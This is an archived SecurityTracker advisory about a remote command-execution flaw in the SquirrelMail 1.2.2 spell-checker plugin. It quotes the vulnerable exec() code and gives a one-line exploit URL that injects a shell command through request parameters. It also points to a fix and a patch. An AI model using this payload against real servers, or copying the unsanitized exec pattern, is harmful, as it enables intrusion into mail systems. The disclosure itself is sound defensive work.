SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   SquirrelMail Vendors:   SquirrelMail Development Team
SquirrelMail Web-based Mail Server Lets Remote Users Execute Arbitrary Code on the Server
SecurityTracker Alert ID:  1003358
SecurityTracker URL:  http://securitytracker.com/id/1003358
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 25 2002
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.2.2
Description:   A vulnerability was reported in SquirrelMail webmail server. A remote user can execute arbitrary commands on the server.

It is reported that the spell checker plugin (check_me.mod.php) allows a remote user to specify commands to be executed on the server. The following type of URL will reportedly trigger the vulnerability:

host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%
20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik

Impact:   A remote user can execute commands on the server with the privileges of the web server.
Solution:   The vendor has released a fixed version (1.2.4), available at:

http://www.squirrelmail.org/download.php

Also, the following patch for 1.2.2 was supplied by a user:

http://www.dulug.duke.edu/~icon/misc/security_fix.sh.txt

Vendor URL:  www.squirrelmail.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  squirrelmail bug



Squirrelmail remote execute commands bug

Version Affected :
1.2.2

Squirrelmail is a webmail system, which allows users to send, get, read etc.
mails. It has some themes, plugins etc. One of the plugins has a very 
interesting piece of code :

from file check_me.mod.php :

$sqspell_command = $SQSPELL_APP[$sqspell_use_app];
...
$floc = "$attachment_dir/$username_sqspell_data.txt");
...
exec ("cat $floc | $sqspell_command", $sqspell_output);


Everything should be ok, but where this page includes config files, where 
are defined $attachment_dir and others ? Answer: Nowhere. We can set up 
variables $sqspell_command and $floc. Result ? We can execute any command
of course as a http serwer owner.

Exploit :

host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%
20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik

<appelast@bsquad.sm.pl>


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC